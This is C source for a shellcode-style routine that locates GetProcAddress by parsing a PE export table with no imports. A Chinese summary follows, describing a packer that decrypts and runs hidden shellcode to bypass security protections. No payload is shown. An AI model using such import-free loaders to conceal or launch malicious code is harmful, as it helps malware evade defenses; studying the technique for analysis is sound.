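 * hMoudleBase: base address of a mapped 32-bit PE image (in this file the
 *              kernel32 base recovered from the PEB in main()).
 * Returns the export's address, or NULL when the pointer is NULL, the
 * headers are not a PE image, the image has no export directory, the name
 * is absent, or the name's ordinal points outside the function table.
 *
 * Fixes relative to the original:
 *  - the loop bound `dwLoop <= NumberOfNames - 1` wrapped to 0xFFFFFFFF for
 *    an empty name table and read off the end of it; it is now `<`.
 *  - the name check compared 14 characters and stopped, so any export that
 *    merely starts with "GetProcAddress" matched; the terminator is now
 *    compared too.
 *  - the ordinal is checked against NumberOfFunctions before indexing.
 * Unchanged limitations: 32-bit only (pointers are truncated to DWORD), and
 * forwarded exports (RVA inside the export directory) are not followed.
 */
FARPROC _GetProcAddresss(HMODULE hMoudleBase)
{
    if (hMoudleBase == NULL)
        return NULL;
    PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hMoudleBase;
    if (lpDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        return NULL;
    PIMAGE_NT_HEADERS32 lpNtHeadr = (PIMAGE_NT_HEADERS32)((DWORD)hMoudleBase + lpDosHeader->e_lfanew);
    if (lpNtHeadr->Signature != IMAGE_NT_SIGNATURE)
        return NULL;
    PIMAGE_DATA_DIRECTORY lpExportDir = &lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (!lpExportDir->Size || !lpExportDir->VirtualAddress)
        return NULL;
    PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hMoudleBase + lpExportDir->VirtualAddress);
    /* The three parallel tables: names, name->ordinal, ordinal->RVA. */
    PDWORD lpdwFunName = (PDWORD)((DWORD)hMoudleBase + lpExports->AddressOfNames);
    PWORD lpdwOrd = (PWORD)((DWORD)hMoudleBase + lpExports->AddressOfNameOrdinals);
    PDWORD lpdwFunAddr = (PDWORD)((DWORD)hMoudleBase + lpExports->AddressOfFunctions);
    /* Target name as a local array so it is built by immediate stores on the
     * stack rather than referenced from .rdata (keeps the stub relocatable). */
    char szTarget[] = {'G','e','t','P','r','o','c','A','d','d','r','e','s','s','\x00'};
    for (DWORD dwLoop = 0; dwLoop < lpExports->NumberOfNames; dwLoop++)
    {
        const char *pFunName = (const char *)((DWORD)hMoudleBase + lpdwFunName[dwLoop]);
        /* Compare up to and including the terminator; no CRT call (strcmp
         * would be an import this code cannot have). */
        DWORD k = 0;
        while (szTarget[k] != '\0' && pFunName[k] == szTarget[k])
            k++;
        if (szTarget[k] != '\0' || pFunName[k] != '\0')
            continue;
        WORD wOrd = lpdwOrd[dwLoop];
        /* Ordinal indexes AddressOfFunctions; a malformed table could point
         * past it, so bound it before use. */
        if (wOrd >= lpExports->NumberOfFunctions)
            return NULL;
        return (FARPROC)((DWORD)hMoudleBase + lpdwFunAddr[wOrd]);
    }
    return NULL;
}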

本文介绍了一种利用壳代码技术,在PE文件中嵌入解密代码,通过修改入口点执行解密后的内容。代码示例展示了如何构造壳代码,动态获取API地址,并解密执行隐藏的shellcode。这种方法常用于绕过安全防护,实现代码隐蔽执行。




